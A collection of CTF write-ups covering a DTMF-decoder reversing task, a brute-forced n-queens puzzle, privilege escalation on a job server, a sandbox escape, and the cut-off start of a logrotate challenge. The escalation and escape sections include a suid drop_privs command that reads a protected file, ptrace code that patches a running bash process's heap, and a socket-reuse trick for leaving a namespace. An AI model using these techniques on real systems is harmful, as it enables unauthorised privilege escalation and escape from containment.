Dialtone challenge

“You might need a pitch-perfect voice to solve this one. Once you crack the code, the flag is CTF{code}.”

Initial thoughts

Unlike other challenges, we probably need to find a ‘code’ which will become part of the flag.
Dialtone sounds like something related to telecommunications, and the description seems to confirm it.

Overview

We are given an attachment called “a.out” which is an x86_64 ELF binary.
Taking a brief look at the ELF, we notice that in addition to imports from standard libraries there are imports from libpulse.so and libpulse-simple.so, which belong to the PulseAudio sound server.

Functions

main()

pa_conn = pa_simple_new(0, *argv, 2, 0, "record", &g_pa_struc, 0, 0, &error);
if (!pa_conn) {
    fprintf(stderr, "pa_simple_new() failed: %s\n", pa_strerror(error));
    return 1;
}
struc.field_0 = 0;
struc.field_4 = 0;
struc.field_8 = 0;
do {
    if (pa_simple_read(pa_conn, buff, 0x8000, &error) < 0) {
        fprintf(stderr, "pa_simple_read() failed: %s\n", pa_strerror(error));
        return 1;
    }
    x(buff, &derived_buff);
    r_result = r(&struc, derived_buff);
    if (r_result < 0) {
        fwrite("FAILED\n", 1, 7, stderr);
        return 1;
    }
} while (r_result);
fwrite("SUCCESS\n", 1, 8, stderr);
pa_simple_free(pa_conn, 1);
return 0;

The plan

We probably want “SUCCESS” to be printed instead of “FAILED”.

Thus we want to make r() return 0 at some point, and avoid negative return values.

Find sinks of our data input to see what’s going on.

x()

bit_flip(buff, derived_buff);
for (i = 1; i < 14; i++) {
    tmp = 1 << i;
    for (j = 0; j < 0x2000; j += tmp) {
        y(derived_buff, j, tmp);
    }
}

This function, and the functions down this path, do not seem to modify the previously read 0x8000 bytes.

Instead, our input is only read in order to produce derived data in derived_buff, which is later passed on to r().

After verifying that the input is only read, we decided to skip over most of the code down this path, noting it may become interesting later when we want to know exactly how derived_buff is created.

r()

int __fastcall r(struct_0* p_struc, void* derived_buff) {
  ++p_struc->field_0;
  if (p_struc->field_0 > 20) {
      return -1;
  }

  arr_1[0] = f(derived_buff, 1209);
  arr_1[1] = f(derived_buff, 1336);
  arr_1[2] = f(derived_buff, 1477);
  arr_1[3] = f(derived_buff, 1633);
  chosen_arr_1_idx = -1;
  tmp_arr_1_val = 1.0;
  for (i = 0; i < 4; i++) {
      if (arr_1[i] > tmp_arr_1_val) {
          chosen_arr_1_idx = i;
          tmp_arr_1_val = arr_1[i];
      }
  }

  arr_2[0] = f(derived_buff, 697);
  arr_2[1] = f(derived_buff, 770);
  arr_2[2] = f(derived_buff, 852);
  arr_2[3] = f(derived_buff, 941);
  chosen_arr_2_idx = -1;
  tmp_arr_2_val = 1.0;
  for (j = 0; j < 4; j++) {
      if (arr_2[j] > tmp_arr_2_val) {
          chosen_arr_2_idx = j;
          tmp_arr_2_val = arr_2[j];
      }
  }

  if (p_struc->field_8) {
      if (chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0) {
          p_struc->field_8 = 0;
          p_struc->field_0 = 0;
      }
      return 1;
  }
  if (chosen_arr_1_idx >= 0 && chosen_arr_2_idx >= 0) {
      y = chosen_arr_1_idx | 4 * chosen_arr_2_idx;
      found_match = 0;
      switch (p_struc->field_4) {
          case 0:
              found_match = y == 9;
          break;
          case 1:
              found_match = y == 5;
          break;
          case 2:
              found_match = y == 10;
          break;
          case 3:
              found_match = y == 6;
          break;
          case 4:
              found_match = y == 9;
          break;
          case 5:
              found_match = y == 8;
          break;
          case 6:
              found_match = y == 1;
          break;
          case 7:
              found_match = y == 13;
          break;
          case 8:
              if (y == 0) {
                  return 0;
              }
          break;
      }
      if (found_match != 1) {
          return -1;
      }
      ++p_struc->field_4;
      p_struc->field_0 = 0;
      p_struc->field_8 = 1;
  }
  return 1;
}
Arguments

p_struc is a reference to a zeroed structure of 3 dwords.

derived_buff is a reference to the derived data written by x() called by main().

Flow

It starts with an increment and a check on the incremented field, so we may treat p_struc->field_0 as some kind of counter.

We notice 2 symmetrical pieces of code which call f() and then loop on the results.

Each loop sets its chosen index variable (chosen_arr_1_idx or chosen_arr_2_idx) to the index of the maximum value in its array, provided a value greater than 1.0 exists; otherwise the index stays -1.

We now reach the first condition for making main() continue looping.

It looks like when p_struc->field_8 != 0 the function would always return 1.

When chosen_arr_1_idx and chosen_arr_2_idx are negative p_struc->field_8 and p_struc->field_0 are set back to 0.

p_struc->field_0 = 0 is a good sign because it makes returning a negative value less likely.

It could be said that p_struc->field_8 is some sort of state flag which needs to keep changing for r() to do something else.

In a subsequent call to r(), when p_struc->field_8 is zero, we can see that if either chosen_arr_1_idx or chosen_arr_2_idx is negative then r() returns 1.

This probably means that for some interesting thing to happen in r() we want (chosen_arr_1_idx >= 0 && chosen_arr_2_idx >= 0) || (chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0).

y = chosen_arr_1_idx | 4 * chosen_arr_2_idx is a 4×4 array index calculation, and the result is compared against constant values inside the switch statement.

If found_match != 1 then a negative value is returned, so we always want found_match == 1.

p_struc->field_4 is incremented which would make us compare other values with y in subsequent calls to r().

p_struc->field_0 = 0 makes us less likely to return -1.

p_struc->field_8 = 1 would lead us into the possibility of returning it to zero if chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0.

After going over the code it is now clear what is the flow:

  • if flag == 0
    • if chosen_arr_1_idx >= 0 and chosen_arr_2_idx >= 0
      • if i == 8 and y == 0
        • SUCCESS
      • if y == constant_nums[i]
        • flag = 1
        • i++
  • else
    • if chosen_arr_1_idx < 0 and chosen_arr_2_idx < 0
      • flag = 0

We want each call to r() to be followed by another call to r() in a way that keeps matching y against the constants until we reach p_struc->field_4 == 8, where y must equal 0.

Our input

At this point we wanted to understand how we can craft derived_buff such that it follows our planned flow until SUCCESS.

But something caught our attention inside f().

double __fastcall f(_complex *modified_buff, int const_val)
{
  return cabs(modified_buff[(const_val << 13) / 44100]);
}
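The expression (const_val << 13) / 44100 maps a frequency in Hz to an index into an 8192-entry buffer of complex values – which looks a lot like an FFT bin at a 44100 Hz sample rate (0x2000 == 8192 also matches the loop bound in x()). A quick sanity check of the bins probed for each constant (our own sketch, not code from the binary):

# bin index probed for each constant (8192-point transform at 44100 Hz)
for freq in (697, 770, 852, 941, 1209, 1336, 1477, 1633):
    print(freq, "Hz -> bin", (freq << 13) // 44100)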

The division by 44100 looked too pretty, so we searched for it on Google and the first result was “44,100 Hz – Wikipedia”, which wasn’t unexpected given the audio context.

This still wasn’t enough to really help us, but we felt lucky, so we decided to Google every constant value we could find in the binary.

It turned out that the constant values passed to the f() calls are all DTMF frequencies.

The DTMF decoder diagrams on Google Images also resembled the state machine of r().

We also found images of DTMF keypads, which are 4×4.

So we started writing down values from the DTMF pad, with chosen_arr_1_idx and chosen_arr_2_idx as our indices, in the order of the y value comparisons.

chosen_arr_1_idx | 4 * chosen_arr_2_idx
  • 1 | 4 * 2 == 9
  • 1 | 4 * 1 == 5
  • 2 | 4 * 2 == 10
  • 2 | 4 * 1 == 6
  • 1 | 4 * 2 == 9
  • 0 | 4 * 2 == 8
  • 1 | 4 * 0 == 1
  • 1 | 4 * 3 == 13
  • 0 | 4 * 0 == 0
         1209 Hz  1336 Hz  1477 Hz  1633 Hz
697 Hz      1        2        3        A
770 Hz      4        5        6        B
852 Hz      7        8        9        C
941 Hz      *        0        #        D
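As a cross-check, here is a small sketch of ours (not code from the binary) that maps the y constants from the switch statement back to keypad digits, using row = y / 4 (chosen_arr_2_idx) and column = y % 4 (chosen_arr_1_idx):

# DTMF keypad: rows are selected by chosen_arr_2_idx, columns by chosen_arr_1_idx
pad = ["123A", "456B", "789C", "*0#D"]

ys = [9, 5, 10, 6, 9, 8, 1, 13, 0]  # constants from r(), in switch-case order
code = "".join(pad[y // 4][y % 4] for y in ys)
print(code)  # prints 859687201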

We got the sequence 859687201 which turned out to be part of the flag as stated in the challenge description: CTF{859687201}

Devmaster 8000 and Devmaster 8001

Setup

This is a docker container that runs a “job server” which can be reached over the Internet.

A job description contains:

  1. Set of input files that are sent to the server, and saved in a sandboxed directory
  2. The command to run in the sandbox (for example: gcc ./inputfile.c -o binary)
  3. Set of output files to download from the server after the job has run

The interesting part of the directory structure of the docker image is:

/etc/                             
/home/                            
/home/user/
          challenge.sh      Startup script that runs the job server  
          server            The job server that accepts and runs jobs  
          admin             An admin server, requires a password to access  
          admin.cc          The source code of the admin server  
          target_loop       Rebuilds the admin server every 30 seconds from admin.cc  
          drop_privs        Drops privileges and executes as the requested uid:gid
          flag              Owned by admin, readonly

/home/user/builds/build-workdir-XXXXX    A unique directory per job

The (interesting) users in /etc/passwd:
root
admin
sandbox-runner-0
sandbox-runner-1
.
.
sandbox-runner-7

Interesting: The admin server is built every 30 seconds from admin.cc via the job server as a regular job.

Observations

The sandbox includes:

  1. The uid:gid is set to sandbox-runner-X, and no 2 jobs run simultaneously as the same user. I.e., if sandbox-runner-0 is running, then the new job will be assigned the next user id, sandbox-runner-1
  2. The job process enters the following namespaces: mount, ipc.
  3. All filesystems are mounted r/o except:
    1. /home/user/builds/build-workdir-XXXXXX of that job is mounted r/w
    2. /proc mounted r/w
    3. /tmp mounted r/w
  4. Notably:
    1. The sandboxing code was copied from the Bazel project, but CLONE_NEWPID and CLONE_NEWUSER were removed.
    2. ptrace is ensured to be available in the challenge.sh startup script
    3. /home/user/drop_privs is owned by root and suid (!)

Devmaster 8000

The challenge is solved by submitting a job that runs

/home/user/drop_privs admin admin cat /home/user/flag

This works since drop_privs is owned by root and suid and sgid.

DevMaster 8001

drop_privs is marked non-executable for non-root users, which precludes the previous solution.

The solution may be overkill 😉

Our goal was to run an executable that has the same uid and gid as the admin-build job.

Attempt #1

Trying to double fork() and reparent ourselves to the init process, thus, the job server would think we were done running, while we are still running.

The job server set prctl(PR_SET_SUBREAPER,1) on the job’s parent and we were unable to reparent ourselves to init.

Attempt #2

Main idea: as sandbox-runner-1, copy a suid executable to /tmp/patcher and then run it as sandbox-runner-0, thus obtaining the uid:gid of sandbox-runner-1 while the job server thinks we are running as sandbox-runner-0.

Note that the admin build job runs

bash -c "sleep 1; g++ --std=c++11 admin.cc -o admin; sleep 1"

and since the job server thinks we are running as sandbox-runner-0, the admin build will run as sandbox-runner-1.

As sandbox-runner-1:

  1. Copy a modified admin.cc to /tmp/.cc – see step 5 to understand the odd filename
  2. Wait for admin build to happen (monitor this with ps)
  3. ptrace attach to the bash process
  4. find bash’s heap (grep heap /proc/pid/maps)
  5. Search for the string “admin.cc” in bash’s heap and replace it with “/tmp/.cc” (same number of chars)
  6. ptrace detach from the bash process

The result will be that bash will compile our own admin server that will output the flag file without any checks.
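For illustration, here is a minimal sketch of steps 3–6 (our own reconstruction, not the actual exploit; the function name is ours and error handling is omitted), using ptrace plus /proc/pid/mem to patch the string in bash’s heap:

import ctypes, os

PTRACE_ATTACH, PTRACE_DETACH = 16, 17
libc = ctypes.CDLL("libc.so.6", use_errno=True)

def patch_heap_string(pid, old, new):
    assert len(old) == len(new)              # same length: no heap layout changes
    libc.ptrace(PTRACE_ATTACH, pid, None, None)
    os.waitpid(pid, 0)                       # wait until the target stops
    # step 4: locate the heap mapping
    with open("/proc/%d/maps" % pid) as maps:
        heap = next(l for l in maps if "[heap]" in l)
    start, end = (int(x, 16) for x in heap.split()[0].split("-"))
    # step 5: search and replace via /proc/pid/mem
    with open("/proc/%d/mem" % pid, "rb+") as mem:
        mem.seek(start)
        data = mem.read(end - start)
        off = data.find(old)
        if off >= 0:
            mem.seek(start + off)
            mem.write(new)
    # step 6: detach and let bash continue
    libc.ptrace(PTRACE_DETACH, pid, None, None)

# patch_heap_string(bash_pid, b"admin.cc", b"/tmp/.cc")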


Below is the timeline of the attack:

Situation at Time: T

  • user sandbox-runner-0 > job bash -c sleep(10)

Situation at Time: T + 5 seconds

  • user sandbox-runner-0 > job bash -c sleep(10)
  • user sandbox-runner-1 > job bash -c cp new-admin.cc /tmp/.cc; cp ./patcher /tmp/patcher; chmod ug+s /tmp/patcher

Situation at Time: T + 10 seconds

  • user sandbox-runner-0 > job /tmp/patcher

Note: /tmp/patcher will actually run as sandbox-runner-1 due to the suid permission.

Situation at Time: T + 10 seconds + sometime (<30)

  • user sandbox-runner-0 > job /tmp/patcher
  • user sandbox-runner-1 > job build admin server (run by the system) – will compile /tmp/.cc instead of admin.cc

Situation at Time: T + 40 seconds

  • connect as new-and-improved admin and get the flag

sandbox-caas

Setup

The server receives 0x800 bytes of shellcode from the user and runs it in a forked process.

The process configuration is as follows:

  • All namespaces are NEW namespaces
  • chroot into ./tmp/.challenge
  • rlimit of one second of CPU time with no core files
  • The process is sent a kill signal after 2 seconds
  • uid and gid are mapped to the original (unknown) uid and gid of the server
  • Process only contains our shellcode (R/O) and a small stack (R/W)
  • The process is being ptrace()d
  • SECCOMP that only allows:
    • read
    • write
    • close
    • munmap
    • sched_yield
    • dup
    • dup2
    • nanosleep
    • connect
    • recvmsg
    • bind
    • exit
    • exit_group
    • clone (CLONE_THREAD | CLONE_VM | CLONE_SIGHAND, ...)
    • socket (AF_INET, SOCK_DGRAM, 0)
    • mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0)
  • Process has the following open file descriptors:
    • fd 0 -> The original socket that was used to send the shellcode to the server
    • fd 1 -> ditto
    • fd 2 -> ditto
    • fd 100 -> UNIX socket. The other end is connected to a “connect-server” see below

The connect-server runs outside of the sandbox, and accepts 2 kinds of messages:

  1. GetEnvData(N) – Sends back one of the following numbers: 1,3,3,7
  2. Connect(AddressOfIP, port) – connects to IP and Port, and sends the connected socket, back to the sandboxed process
    • The only allowed IP and port are 127.0.0.1:8080

Two additional servers exist:

  1. Metadata server on 127.0.0.1:8080
    • Accepts a connections
    • Sends “Not implemented”
    • Closes the connection
  2. Flag server on 127.0.0.1:6666
    • Accepts a connection
    • Sends the contents of the flag file

Observations

The Connect() function is the interesting function and contains 2 potential bugs:

  1. There seems to be a TOCTOU bug between the VERIFY stage and the CONNECT stage.
  2. If the connect() fails, the socket is still passed to our sandboxed process.

Main idea

The namespace of a socket is determined at the time of creation of the socket. Thus, if we receive a socket from the outside that has not been connect()ed, we can use it to connect to 127.0.0.1:6666 from within the sandbox.
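Conceptually (the actual payload is shellcode, but Python is clearer; this assumes the connect-server’s connect() failed and the unconnected socket was passed to us anyway, per bug 2), the idea looks like this:

import array, socket

def recv_fd(control):
    # receive one file descriptor over a UNIX socket (SCM_RIGHTS)
    msg, ancdata, flags, addr = control.recvmsg(1, socket.CMSG_LEN(4))
    for level, ctype, data in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            return array.array("i", data)[0]

control = socket.socket(fileno=100)   # the UNIX socket to the connect-server
fd = recv_fd(control)                 # socket created OUTSIDE our namespaces
s = socket.socket(fileno=fd)
s.connect(("127.0.0.1", 6666))        # reaches the host's loopback
print(s.recv(128))                    # the flag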

Looking into the TOCTOU issue:

The processing of the Connect() message is done as follows:

  1. Obtain port and address of IP from our message
  2. ip = SafeRead(sandboxPid, AddressOfIP)
  3. Fail if ip:port != 127.0.0.1:8080
  4. ip = SafeRead(sandboxPid, AddressOfIP)
  5. fd = connect(ip:port)
  6. SendFDToSandbox(fd)

The SafeRead(sandboxPid, AddressOfIP) function does as follows:

  1. Try 3 times until success or return error:
    1. Verify the sandboxPid is in read() or recvmsg() syscall
    2. Sleep(100 microseconds) ← Note: always happens at least once!
  2. Check that GetNumberOfThreads(sandboxPid) for the sandboxed process is <= 1
  3. return process_vm_readv(sandboxPid, addressOfIP)

It seems that our process must be blocked on read() or recvmsg() and no other threads may be running.

After (many) failed attempts to pass the above checks, we realized that the GetNumberOfThreads() function had a bug that caused it to always return -1 threads.

The bug was that GetNumberOfThreads() was reading the /proc/sandboxPid/status file and using ftell() to determine the size of the file.

However, ftell() returns 0 for /proc/ files, so GetNumberOfThreads() never found the string “Threads: ” in the empty buffer read from the file, and in turn returned -1 as the number of threads.
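This is easy to demonstrate: /proc files report a size of 0 even though reading them returns real content. A quick illustration of ours:

import os

print(os.stat("/proc/self/status").st_size)   # 0: /proc files report zero size
with open("/proc/self/status") as f:
    print(len(f.read()))                      # > 0: yet the content is there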

Solving

The shellcode did the following:

  1. sys_clone(thread_t)
  2. sys_write(fd=100, “Connect(stack address containing 127.0.0.1, 8080)”, …)
  3. socket_fd = sys_recvmsg()
  4. sys_connect(socket_fd, “127.0.0.1”, 6666)
  5. sys_read(socket_fd, &flag)
  6. sys_write(1, &flag)

thread_t:

  1. sys_nanosleep(X microseconds), X ≈ 600,000 (this value actually worked on the first try)
  2. modify the IP address on the stack to a non-routable IP, we used 127.127.255.255
  3. sys_exit()

The flag was: CTF{W3irD_qu1rKs}

A few afterthoughts

We had to select an IP that makes connect() fail immediately; otherwise connect() takes too long to time out. Therefore, a non-routable address was chosen.

We wonder whether the GetNumberOfThreads() bug was the only way to pass this riddle. The seccomp filter included the option to create a UDP/IP socket, but there is no interface to bind to. Binding to 0.0.0.0 succeeds, but subsequent read()s fail, due to the fact that there are no interfaces.

Notifico

This is a writeup for how we solved the notifico 35c3 CTF challenge.

The task:

We are presented with a tar file which contains another tar file, an executable named check, and the python script check.py.
The inner tar file contains 225 folders, each of which contains one regular file and between 42 and 56 symbolic links to files in other folders.

The check.py script (python3) runs the check executable on the folder and verifies that its result is 15. It then concatenates a “magic” string from the modes (file_mode & 0o777) of the alphabetically ordered regular files, takes the sha256 of the magic as a key, and decrypts the encrypted flag with the digest. If the result contains the standard flag prefix (35C3) and the flag is made of alphanumeric characters, it prints the flag.

The check executable performs 4 actions:
• iterates over the folders and creates an inotify watch with mask 9 (IN_ACCESS | IN_CLOSE_WRITE) on all the regular files. Note that IN_ACCESS means “File was accessed (e.g., read(2), execve(2))”. While creating the watches it checks the mode of each regular file: if the owner’s write permission XOR execute permission is not 0, or if the file has any of the rwx permissions for other users, the executable returns 255.
• Opens and closes all the regular files (which should cause an IN_CLOSE_WRITE notification)
• Tries to execute all the symbolic links (which should cause an IN_ACCESS notification if the file is executable)
• Reads and analyses the inotify watch results. If anything was executed it returns 255; otherwise it returns the number of close notifications received.

Initial analysis:

If we want to get something decrypted, we should find a set of 15 folders whose links do not point to files inside the set, set +wx permissions on the regular files inside these folders, and run check.py to check the result.
At this stage it is still unclear how many combinations of this kind exist. The order inside a combination doesn’t matter.
It seems we should check the results of all these sets for decryptability.

As per the hint (we won’t need it), the graph we get here resembles the problem of enumerating 15 queens on a 15×15 chess board, where the folders are squares on the board [a-o][1-15].
I wasn’t able to map all the folders to exact places on the board (only the center one and the main diagonals), but we don’t really need that.

We’ll bruteforce it.

The bruteforce:

During any bruteforce we usually have 3 main problems:
• performance
• performance
• and once again performance.

As far as I remember, the number of unique solutions for this problem on an N-sized board has its own sequence name (A000170, “Number of ways of placing n nonattacking queens on an n X n board”
(Formerly M1958 N0775)) and can be found here: https://oeis.org/A000170
For the 15×15 board it is 2279184, which is not too much; the problem is finding these solutions in reasonable time while avoiding duplicates.
I have a good workstation at home, and I can afford parallel bruteforcing, so let’s do it.

1 – Let’s construct some kind of representation of the graph.

In the directory containing the challenge archive, let’s run the following shell commands:

# unpack the folder
tar -xf *.tar.gz			 
cd chall
# get list of folders into folders.txt
ls -l | cut -d" " -f 9 > ../folders.txt
cd ..
# create a listing of the folder in corresponding .fld file
for i in `cat folders.txt`; do ls -l ./chall/$i > $i.fld ; done

Now we have all the links.

2 – Let’s get the alphabetically ordered folders exactly as they are in the script

We just remove the execution of the check executable from the check script, and add a print of the file name in the loop that creates the “magic”.

Here is what we got after some small editor massaging:

ind2fold = {
	0 : "APFLtDMGfSvLChWH",
	1 : "ASzhPMFMNmpBMEOm",
	2 : "AYenxPNbHIIxFaBs",
	3 : "AkpRSKtliwhtjBLO",
	4 : "AlUQWFAVMYyANtGl",
	5 : "BpFkWrUBXvwAVywH",
	6 : "BsPQryqrPSPUniAt",

	...
	...
	...

	218 : "zIzNJPYLPMyBuaWj",
	219 : "zNkvKHFVpILKhGee",
	220 : "zQiyomzHVpITGMFx",
	221 : "zUfpdFqENVnMqMbh",
	222 : "zWvRJALKMjTnoaxf",
	223 : "zoPhogrElBntiQUN",
	224 : "zsEGaUEJXslKOiZP",
}

fold2ind = {}

for i in ind2fold:
	fold2ind[ind2fold[i]] = i

3 – Let’s read the folder structure for building some graph representation:

Let’s read all the “.fld” files created earlier and analyze them as follows:

import sys

xrefto = {}
xreffrom = {}

folders_found = []
folders_dict = {}

# we get all the fld files via command line

for n in sys.argv[1:]:
	f = open(n, "r")
	res = []
	current_folder = n.replace(".fld", "")
	folders_found.append(current_folder)
	folders_dict[current_folder] = True
	for l in f:
		if l.find("-> ../") != -1: #analyzing a link
			splitted = l.split()
			res.append( splitted[-1].split('/')[1]) # getting a folder to which it points
	xrefto[current_folder] = sorted(res)
	# creating an opposite direction
	for r in sorted(res):
		if not r in xreffrom:
			xreffrom[r] = [current_folder]
		else:
			xreffrom[r].append(current_folder)
	f.close()

In this piece of code we build 2 dictionaries that represent, for each folder, where its links point to (xrefto) and which folders point to it (xreffrom).

4 – Let’s add some multiprocessing and start to avoid duplicates:

Since the order inside the combination doesn’t matter, we can conclude the following:
  • We should define some order inside the combination. Alphabetical order is OK; we’ll call all combinations ordered in another way unordered, and skip them.
  • This gives us the possibility to multi-process: during the brute-force we can start from different folders (i.e. cells of the board) and exclude what we don’t need.

This gives us the following bruteforce run:

import multiprocessing
...
...
...

processes = []

folders_found = sorted(folders_found)

for i in range(len(folders_found) - 15):
	res_stack = []
	processes.append(multiprocessing.Process(target = bruteforce, args = (folders_dict.copy(), xreffrom, xrefto, 0, res_stack[:], True)))
	folders_dict.pop(folders_found[i], None)
	# note that we run on a different set each time, removing one starting
	# folder per bruteforcing instance

for p in processes:
	p.start()

5 – Let’s write the bruteforce itself

# sorry, the code is ugly

def bruteforce(current_set, # places on the board left
	xrf, # xrefs from and to the places of the board collected earlier
	xrt,
	level, # current recursion level
	variant, # current variant 
	only_first): # dirty hack: see the usage

	variant = variant[:]
	current_set = current_set.copy() # copy the current set, we'll have to change it
	if level == 15:
		check(sorted(variant)) 
		# if we arrived to recursion level 15 then we have a variant, let's check it
		return False

	for f in sorted(current_set.keys()):
		# iterating the current set of places left unbeaten in alphabetical order
		new_set = current_set.copy()
		new_set.pop(f, None) # exclude current cell from the set

		# exclude fields beaten by the current cell 
		for x in xrt[f]:
			new_set.pop(x, None)

		# exclude fields that don't fit the alphabetical ordering

		test_set = new_set.copy()
		for t in test_set:
			if t < f:
				new_set.pop(t, None)

		if (len(new_set.keys()) + level) < 15:
			# bail out if there are not enough places left
			return False

		variant.append(f)
		# go down with the recursion
		bruteforce(new_set, xrf, xrt, level + 1, variant, False)
		variant.remove(f)
		if only_first:
			# on the first level we want to check only one variant
			# all others will be checked in other instances
			print("Bruteforce started from", f, " finished")
			return False
	return False

6 – Let’s copy out the checking from the check.py and fix it

#!/usr/bin/env python3
from sys import argv
import re
import hexdump
from hashlib import sha256
from Crypto.Cipher import AES

def check (variant):
	res = ""
	enc_flag = b'\x99|8\x80oh\xf57\xd4\x81\xa5\x12\x92\xde\xf5y\xbc\xc0y\rG\xa8#l\xb6\xa1/\xfeE\xc5\x7f\x85\x9a\x82\x0b\x02Y{\xd9/\x92X>p\\\xb7H\xb1{\xcf\x8b/r=\x87-#\xae\x95\xb6\xd1\r\x03\x13'
	flag_fmt = r"35C3_[\w]*"

	global ind2fold
	global fold2ind
	cnt = 0
	# creating the magic
	for i in range(len(ind2fold.keys())):
		if ind2fold[i] in variant:
			cnt += 1
			res += "700"
		else:
			res += "400"

	# checking for obvious mistakes,
	# we should have 15 queens and 225 cells in total

	if cnt != 15 or len(res) != 225*3:
		print ("Error!Error!Error!Error!Error!Error!Error!Error!Error!Error!Error!")
		exit(1)

	magic = res
	try:
		flag = AES.new(sha256(magic.encode()).digest(), AES.MODE_ECB).decrypt(enc_flag)
		if flag.decode().find("35C3_") != -1:
			hexdump.hexdump(flag)
		if re.fullmatch(flag_fmt, flag.decode()) is not None:
			print("Looks good, here is your output: {}".format(flag))
			# exit(0)
			# we removed the original exit because we want to know how
			# much time the full bruteforce takes
	except Exception:
		pass

	return res

7 – Let’s run it.

Actually, running it with python3 may be a bit slower than we need. Let’s run it with pypy3:

pypy3.5-6.0.0-linux_x86_64-portable/bin/pypy3 multi_dict.py *.fld

It yields the flag b’35C3_congr4ts_th0se_were_s0m3_truly_w3ll_pl4c3d_perm1ssions_Sir_’

It takes some hours on my home workstation, but if we did everything right, it should finish in a reasonable time.

Timing of the bruteforce

In order to get the flag I left this executing before going to sleep.
However, I was curious exactly how much time it should take, so I added some prints and ran it again.
It appears that getting the flag takes about an hour, and the full bruteforce takes about 2 hours on my computer (Ubuntu 18.04.1, i7 Coffee Lake, 64 GB RAM).

See the output of the script below:

╰─$ ../pypy3/pypy3.5-6.0.0-linux_x86_64-portable/bin/pypy3 ./multi_dict.py *.fld
Starting
2018-12-31 21:19:26.262807
Length is 225
Bruteforce started from mEXeTszvrPQxLSIM finished
.
< - cut - >
.
Bruteforce started from FacVEEUFvQtVfjcj finished
Bruteforce started from ISOYfrwvVOMZveHE finished
Ending
2018-12-31 22:21:36.675702
400400400400400400400400400400700400400400400400400400400400400400400400400400400400700400400400400400400700400400400400400400400400400400700700400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400700400700400400400400400400400400400400400400400400400400400400400400400700400400400700400400400400400400400400400400400400400400400400700400400700400400400400700400400400400400400400400700400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400700400700400400400400400400
00000000: 33 35 43 33 5F 63 6F 6E 67 72 34 74 73 5F 74 68 35C3_congr4ts_th
00000010: 30 73 65 5F 77 65 72 65 5F 73 30 6D 33 5F 74 72 0se_were_s0m3_tr
00000020: 75 6C 79 5F 77 33 6C 6C 5F 70 6C 34 63 33 64 5F uly_w3ll_pl4c3d_
00000030: 70 65 72 6D 31 73 73 69 6F 6E 73 5F 53 69 72 5F perm1ssions_Sir_
Looks good, here is your output: b'35C3_congr4ts_th0se_were_s0m3_truly_w3ll_pl4c3d_perm1ssions_Sir_'
Bruteforce started from FsiBPvyjOwaioLBP finished
Bruteforce started from ExCZSjfztnUcXCqh finished
Bruteforce started from GmSNArrbwMYaJsND finished
Bruteforce started from FLsGyEZReOEFwvqm finished
Bruteforce started from EQsvyIRczZVqeYkD finished
Bruteforce started from DvixmyIxrLeiXeZv finished
Bruteforce started from DqOgFKUtvPDxcDhA finished
Bruteforce started from FbLGtlhVWXDzMEEv finished
Bruteforce started from CIMHMvnbzSHPSZzw finished
Bruteforce started from DTGRkOyLvIRXOcFA finished
Bruteforce started from DvEdLxkYtbjDeMmI finished
Bruteforce started from DQiHxMFfQxEjRzak finished
Bruteforce started from BuuhlRIKIUKQixNn finished
Bruteforce started from DBdOhoYdrCrzteVm finished
Bruteforce started from AlUQWFAVMYyANtGl finished
Bruteforce started from DRlKwGefVbUJbweg finished
Bruteforce started from BsPQryqrPSPUniAt finished
Bruteforce started from BxztQECAmlZiVgLd finished
Bruteforce started from AkpRSKtliwhtjBLO finished
Bruteforce started from BpFkWrUBXvwAVywH finished
Bruteforce started from ASzhPMFMNmpBMEOm finished
Bruteforce started from AYenxPNbHIIxFaBs finished
Bruteforce started from APFLtDMGfSvLChWH finished
╭─[cenzored]@[cenzored] ~/ctfs/notifico
╰─$ date
Mon Dec 31 23:01:46 IST 2018

Logrotate / ZajeBiste / 500 points

The challenge (as stated in the 35C3 website)

“Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.

For your convenience, I added a suid binary to run cron jobs. Enjoy. Files at:

https://35c3ctf.ccc.ac/uploads/logrotate-6c103367e3c15cb6873403e16b38f540.tar And get your shell here: nc 35.242.226.147 1”

Environment overview

The nc seems to enter an nsjail docker instance running an unprivileged shell.
nc 35.242.226.147 1
+ echo 'Setting up chroot.'
Setting up chroot.
+ cp -R --preserve=mode /skel /tmp/
+ mount -o bind /proc /tmp/skel/proc
+ touch /tmp/skel/dev/null
+ touch /tmp/skel/dev/zero
+ touch /tmp/skel/dev/random
+ touch /tmp/skel/dev/urandom
+ mount -o bind /dev/null /tmp/skel/dev/null
+ mount -o bind /dev/zero /tmp/skel/dev/zero
+ mount -o bind /dev/random /tmp/skel/dev/random
+ mount -o bind /dev/urandom /tmp/skel/dev/urandom
+ cp -R --preserve=mode /home/user /tmp/skel/home/
+ chmod u+s /tmp/skel/home/user/run_cron
+ cp --preserve=mode /tmp/skel/etc/cron.daily/logrotate /tmp/skel/etc/cron.d/
+ cp --preserve=mode /home/user/pwnme /tmp/skel/etc/logrotate.d/
+ cp /flag /tmp/skel/
+ chmod 400 /tmp/skel/flag
+ echo 'Setup done.'
Setup done.
+ exec /usr/sbin/chroot /tmp/skel /home/user/unpriv

uname -a
Linux NSJAIL 4.14.65+ #1 SMP Thu Oct 25 10:42:50 PDT 2018 x86_64 GNU/Linux

id
uid=1000(user) gid=1000(user) groups=1000(user),0(root)

The interesting parts of the file system

/
/flag                          ← The flag file, permissions 400 (readable only by root)
/bin
/proc
/usr
	/sbin
		logrotate      ← The latest logrotate executable, ver 3.11.0
/etc
	logrotate.conf         ← logrotate main config file, includes /etc/logrotate.d/*
	/cron.d
		logrotate      ← Runs logrotate with the main config file
	/logrotate.d/
		pwnme          ← logrotate log definition

/home
	/user
		chroot.sh      ← The docker startup script, seen above in the nc output
		run_cron       ← Runs all the files found in /etc/cron.d/ as root(!)

/tmp/                          ← Empty tmpfs


Please note that all the above files and directories, barring the /flag file, are
owned by root and have read and execute permissions for all users.

Looking at the pwnme logrotate config file, we see:

cat /etc/logrotate.d/pwnme
/tmp/log/pwnme.log {
	daily
	rotate 12
	missingok
